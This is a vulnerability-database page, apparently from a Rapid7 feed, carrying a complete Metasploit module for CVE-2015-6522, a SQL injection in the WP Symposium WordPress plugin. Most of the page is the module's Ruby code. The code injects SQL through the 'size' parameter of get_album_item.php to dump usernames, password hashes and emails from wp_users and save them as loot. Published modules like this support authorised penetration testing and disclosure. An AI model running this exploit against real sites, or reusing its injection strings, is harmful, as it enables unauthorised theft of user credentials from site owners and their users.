WordPress Symposium Plugin SQL Injection

Published: 17 Nov 2016 14:04:53
Reported by: PizzaHatHacker, Matteo Cantoni <[email protected]>
Type: metasploit
Source: www.rapid7.com
Views: 55

Exploiting SQL injection in WordPress Symposium Plugin

Related

Family | Title | Published | Reporter
Circl | CVE-2015-6522 | 29 May 2018 15:50 | circl
CNVD | WordPress WP Symposium Plugin SQL Injection Vulnerability | 20 Aug 2015 00:00 | cnvd
Check Point Advisories | WordPress Symposium Plugin SQL Injection (CVE-2015-6522) | 8 Dec 2016 00:00 | checkpoint_advisories
CVE | CVE-2015-6522 | 19 Aug 2015 15:00 | cve
Cvelist | CVE-2015-6522 | 19 Aug 2015 15:00 | cvelist
NVD | CVE-2015-6522 | 19 Aug 2015 15:59 | nvd
OpenVAS | WordPress WP Symposium Multiple SQL Injection Vulnerabilities | 24 Aug 2015 00:00 | openvas
Packet Storm | WordPress Symposium Plugin SQL Injection | 31 Aug 2024 00:00 | packetstorm
Patchstack | WordPress Symposium Plugin 15.1 - SQL Injection #2 | 18 Aug 2015 00:00 | patchstack
Patchstack | WordPress Symposium Plugin <= 15.7 - SQL Injection | 19 Aug 2015 00:00 | patchstack

Code

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Symposium Plugin SQL Injection',
        'Description' => %q{
          This module exploits a SQL injection vulnerability in the WP Symposium plugin
          before 15.8 for WordPress, which allows remote attackers to extract credentials
          via the size parameter to get_album_item.php.
        },
        'Author' => [
          'PizzaHatHacker', # Vulnerability discovery
          'Matteo Cantoni <goony[at]nothink.org>' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2015-6522'],
          ['EDB', '37824']
        ],
        'DisclosureDate' => '2015-08-18'
      )
    )

    register_options(
      [
        OptString.new('URI_PLUGIN', [true, 'The WordPress Symposium Plugin URI', 'wp-symposium'])
      ]
    )
  end

  def check
    check_plugin_version_from_readme('wp-symposium', '15.8.0', '15.5.1')
  end

  def uri_plugin
    normalize_uri(wordpress_url_plugins, datastore['URI_PLUGIN'], 'get_album_item.php')
  end

  def send_sql_request(sql_query)
    uri_complete = normalize_uri(uri_plugin)

    begin
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => uri_complete,
        'vars_get' => { 'size' => sql_query }
      )

      return nil if res.nil? || res.code != 200 || res.body.nil?

      res.body
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e
      vprint_error("#{peer} - The host was unreachable!")
      return nil
    end
  end

  def run
    vprint_status("#{peer} - Attempting to connect...")
    vprint_status("#{peer} - Trying to retrieve the first user id...")
    first_id = send_sql_request('id from wp_users order by id asc limit 1 ; --')
    if first_id.nil?
      vprint_error("#{peer} - Failed to retrieve the first user id... Try with check function!")
      return
    else
      vprint_status("#{peer} - First user-id is '#{first_id}'")
    end

    vprint_status("#{peer} - Trying to retrieve the last user id...")
    last_id = send_sql_request('id from wp_users order by id desc limit 1 ; --')
    if last_id.nil?
      vprint_error("#{peer} - Failed to retrieve the last user id")
      return
    else
      vprint_status("#{peer} - Last user-id is '#{last_id}'")
    end

    credentials = ''

    vprint_status("#{peer} - Trying to retrieve the users information...")
    for user_id in first_id..last_id
      separator = Rex::Text.rand_text_numeric(7, bad = '0')
      user_info = send_sql_request("concat_ws(#{separator},user_login,user_pass,user_email) from wp_users where id = #{user_id} ; --")

      if user_info.nil?
        vprint_error("#{peer} - Failed to retrieve the users info")
        return
      else
        values = user_info.split(separator.to_s)

        user_login = values[0]
        user_pass = values[1]
        user_email = values[2]

        print_good("#{peer} - #{sprintf('%-15s %-34s %s', user_login, user_pass, user_email)}")
        connection_details = {
          module_fullname: fullname,
          username: user_login,
          private_data: user_pass,
          private_type: :nonreplayable_hash,
          status: Metasploit::Model::Login::Status::UNTRIED,
          proof: user_email
        }.merge(service_details)
        create_credential(connection_details)

        credentials << "#{user_login},#{user_pass},#{user_email}\n"
      end
    end

    unless credentials.empty?
      loot = store_loot('wp_symposium.http', 'text/plain', rhost, credentials)
      vprint_good("Credentials saved in: #{loot}")
    end
  end
end

Scores (current as of 07 Jan 2024 20:02)
Vulners AI Score: 8.4 (High risk)
CVSS 2: 7.5
EPSS: 0.79815
Views: 55